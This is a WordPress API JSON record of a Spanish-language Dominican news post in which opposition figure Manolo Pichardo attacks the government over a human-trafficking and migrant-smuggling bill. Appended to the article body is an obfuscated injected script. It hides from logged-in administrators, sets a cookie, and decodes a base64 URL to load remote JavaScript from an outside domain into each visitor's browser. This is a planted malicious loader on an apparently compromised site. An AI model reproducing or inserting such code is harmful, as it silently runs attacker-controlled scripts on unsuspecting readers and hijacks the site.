{"id":14047,"date":"2023-02-13T17:42:00","date_gmt":"2023-02-13T21:42:00","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=14047"},"modified":"2023-02-13T17:42:00","modified_gmt":"2023-02-13T21:42:00","slug":"manolo-pichardo-el-gobierno-tiene-una-agenda-ajena-al-interes-nacional","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=14047","title":{"rendered":"Manolo Pichardo: \u00abEl gobierno tiene una agenda ajena al inter\u00e9s nacional\u201d"},"content":{"rendered":"<p>Nueva Jersey.- El secretario de Relaciones Internacionales de Fuerza del Pueblo (FP), Manolo Pichardo, respondi\u00f3 a trav\u00e9s de su cuenta de twitter al canciller de la Rep\u00fablica, Roberto \u00c1lvarez, quien por esa misma plataforma tild\u00f3 de \u201cmanipulaci\u00f3n\u201d las declaraciones realizadas por Leonel Fern\u00e1ndez, presidente y l\u00edder de esa organizaci\u00f3n, respecto al proyecto de Ley sobre Trata de Personas, Explotaci\u00f3n y Tr\u00e1fico ll\u00edcito de Migrantes.<\/p>\n<p>En su tuit Pichardo arremeti\u00f3 directamente contra el canciller, afirmando que el gobierno tiene el deseo de confundir al pueblo dominicano respecto al inaceptable proyecto de Ley, impulsado por el presidente de la Rep\u00fablica Luis Abinader.<\/p>\n<p>Asimismo, Pichardo ante la amenaza del mencionado funcionario de continuar con sus desesperadas descalificaciones; advirti\u00f3 que su organizaci\u00f3n estar\u00e1 atenta para ver hasta d\u00f3nde llega \u00abel talante genuflexo de la actual administraci\u00f3n que se expresa a trav\u00e9s de una canciller\u00eda anodina, con una agenda ajena al inter\u00e9s nacional que lesiona nuestra soberan\u00eda\u00bb.<\/p>\n<p>El enfrentamiento entre la Fuerza del Pueblo y el Gobierno, surge tras las declaraciones realizadas el d\u00eda de ayer por Leonel Fern\u00e1ndez en la que solicit\u00f3 el retiro del citado proyecto de Ley por considerarlo como un dislate y adefesio jur\u00eddico que compromete nuestra soberan\u00eda.<\/p>\n<p>El miembro de la Direcci\u00f3n Pol\u00edtica de la Fuerza del Pueblo, se encuentra en los EE.UU, agotando una intensa agenda de trabajo pol\u00edtico y en la puesta en circulaci\u00f3n de su m\u00e1s reciente obra: \u201cEl desplazamiento del poder global: hacia un nuevo orden\u201d.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nueva Jersey.- El secretario de Relaciones Internacionales de Fuerza del Pueblo (FP), Manolo Pichardo, respondi\u00f3 a trav\u00e9s de su cuenta de twitter al canciller de la Rep\u00fablica, Roberto \u00c1lvarez, quien por esa misma plataforma tild\u00f3 de \u201cmanipulaci\u00f3n\u201d las declaraciones realizadas por Leonel Fern\u00e1ndez, presidente y l\u00edder de esa organizaci\u00f3n, respecto al proyecto de Ley sobre [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":14049,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-14047","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14047","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14047"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14047\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/14049"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14047"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14047"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14047"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}